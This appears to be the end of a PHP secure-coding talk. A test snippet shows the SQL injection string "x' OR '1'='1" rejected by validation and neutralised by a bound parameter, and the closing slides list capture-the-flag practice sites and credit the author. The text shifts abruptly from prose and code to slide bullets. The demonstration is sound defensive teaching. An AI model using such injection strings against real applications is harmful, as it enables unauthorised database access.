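echo handleProfileLookup($db, $session, ['csrf_token' => $token, 'email' => "x' OR '1'='1"]), "\n";       // fails validation
echo handleProfileLookup($db, $session, ['csrf_token' => $token, 'email' => 'alice@example.com']), "\n";  // user #1

// Even if validation were skipped, the bound parameter keeps the payload inert.
var_dump(findUserByEmail($db, "x' OR '1'='1"));  // NULL: the quote is data, not SQL
```

The framework version of this is the same three steps wired into middleware and the ORM; the reason to see them once by hand is to know what is missing when a raw query or a hand-rolled form skips the layer.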
• 40. CAPTURE ALL THE FLAGS!
  • NotSoSecure CTF: http://cx.notsosecure.com
  • Security Shepherd: https://www.owasp.org/index.php/OWASP_Security_Shepherd
  • http://hax.tor.hu/
  • https://pwn0.com/
  • http://www.smashthestack.org/
  • http://www.hellboundhackers.org/
  • http://www.overthewire.org/wargames/
  • http://counterhack.net/Counter_Hack/Challenges.html
  • http://www.hackthissite.org/
  • http://exploit-exercises.com/
  • http://vulnhub.com/
• 41. THANK YOU! Alison Gianotto (aka “snipe”)
  • @snipeyhead on Twitter
  • snipe@snipe.net